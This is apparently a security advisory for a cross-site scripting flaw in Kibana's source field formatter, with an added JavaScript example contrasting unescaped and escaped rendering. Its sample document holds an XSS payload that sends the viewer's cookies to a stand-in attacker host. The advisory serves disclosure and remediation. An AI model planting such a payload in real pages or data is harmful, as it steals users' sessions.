Kibana versions 5.3.0 to 6.4.1 had a cross-site scripting (XSS) vulnerability via the source field formatter that could allow an attacker to obtain sensitive information from or perform destructive actions on behalf of other Kibana users.
References:
https://www.elastic.co/community/security
https://discuss.elastic.co/t/elastic-stack-6-4-1-and-5-6-12-security-update/149035
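The bug class behind this advisory is a renderer that takes field values from an indexed document and interpolates them into page markup without escaping, so a document written by an attacker executes script in the browser of any Kibana user who views it. The following is an added illustration of that class, not Kibana's own source field formatter or the upstream fix: the function names, the rendering approach and the sample document are assumptions made for this example.

```javascript
// Added example of unescaped field rendering (the XSS bug class) beside a hardened form.
// Not Kibana code: renderSourceUnsafe/renderSourceSafe, escapeHtml, the sample
// document and containsScriptableTag are assumptions made for this illustration.

// Minimal HTML escaping that is safe for text nodes and double-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern: keys and values from the stored document go straight into markup.
function renderSourceUnsafe(doc) {
  return Object.entries(doc)
    .map(([key, value]) => `<dt>${key}</dt><dd>${value}</dd>`)
    .join('');
}

// Hardened pattern: every untrusted string is escaped before interpolation.
function renderSourceSafe(doc) {
  return Object.entries(doc)
    .map(([key, value]) => `<dt>${escapeHtml(key)}</dt><dd>${escapeHtml(value)}</dd>`)
    .join('');
}

// Constructed sample document: one field carries a payload that an attacker able to write
// to the index could plant, aiming at the cookies of whoever views the document.
const sampleDoc = {
  host: 'web-01',
  message: '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">'
};

// Crude check used to compare the two renderers: does the output still contain a tag
// that a browser would execute? The <dt>/<dd> wrapper tags are deliberately not matched.
function containsScriptableTag(html) {
  return /<(script|img|svg|iframe)\b/i.test(html);
}

// Stand-alone demonstration.
console.log('unsafe output executable:', containsScriptableTag(renderSourceUnsafe(sampleDoc)));
console.log('safe output executable:  ', containsScriptableTag(renderSourceSafe(sampleDoc)));
```

Escaping at the point of rendering is the fix for this class regardless of how the data reached the index; input filtering on the ingest side does not help, because log data is untrusted by definition and older documents are already stored.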
The version included in Red Hat OpenStack 8 & 9, released as a technical preview, does not contain the vulnerable code. The affected functionality is not present in kibana-3.1.2; the source field formatter was introduced in a significant rewrite after that version.
Upstream commits:
6.4: https://github.com/elastic/kibana/commit/45e4791efd405b2691c4008d6c3a050e0e7bbdcc#diff-efac77c548187c0b16fe1e531c8210ae
5.6: https://github.com/elastic/kibana/commit/a07347478b7a3b1661cfb77c149fd15bdeb8921d#diff-3ff6e2858b8906e63dd44b7ac317f199
This issue has been addressed in the following products:
Red Hat OpenShift Container Platform 3.11, via RHSA-2018:3537: https://access.redhat.com/errata/RHSA-2018:3537